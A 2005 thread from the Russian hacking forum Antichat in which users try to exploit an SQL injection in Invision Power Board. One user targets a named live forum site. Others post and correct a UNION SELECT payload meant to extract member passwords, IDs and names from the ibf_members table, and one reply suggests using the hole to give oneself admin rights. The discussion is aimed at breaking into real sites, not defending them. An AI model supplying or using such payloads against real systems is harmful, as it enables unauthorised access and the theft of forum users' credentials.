Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   SQL-инъекция в Invision Power Board (https://forum.antichat.xyz/showthread.php?t=6043)

Юличка 14.04.2005 14:09

SQL-инъекция в Invision Power Board
 
Сразу к делу вот просто форум

http://masichka.novoross.ru/forum/index.php

далее я сформироваю URL вот такой:

http://masichka.novoross.ru/forum/in...=SQL_INJECTION

вылетает окно;) и что дальше?? :confused:

CunningFox 14.04.2005 18:38

ошиба это..

GaD 15.04.2005 10:24

Ну и?

GaD 15.04.2005 11:16

%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0 ,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

С таким запросом не работает, а в чем ошибка?

Algol 15.04.2005 15:20

Цитата:

Сообщение от GaD
%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0 ,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

С таким запросом не работает, а в чем ошибка?

Ну во первых
1,100%20UNION%20SELECT%200,0,password,id,name,0,0, 0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
А во-вторых все равно работать не будет, поскольку ORDER BY несовместимо с UNION

SEVKA 15.04.2005 16:14

Вот читаю на секюрити лаб

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных уязвимого приложения.

Пример:

http://[target]/forums/index.php?act=Members
&max_results=30&filter=1&sort_order=asc&
sort_key=name&st=SQL_INJECTION

----------------------------------------------------------------------------------

И кто мне доступно обяснит как этим пользоваться ?

(-=util=-) 15.04.2005 17:10

SQL_INJECTION

тут sql язык надо знать хорошо =\
типа создание таблиц перемещиние и т.д. с помощью этого можно свой аккаунт допустим сделать админским.

GaD 16.04.2005 11:46

круто... и правда работает и правда материться на использование Union и Order By, а вобще можно заюзать как нибудь этот баг?

GaD 16.04.2005 12:05

Ну ё мое :confused:


Время: 07:00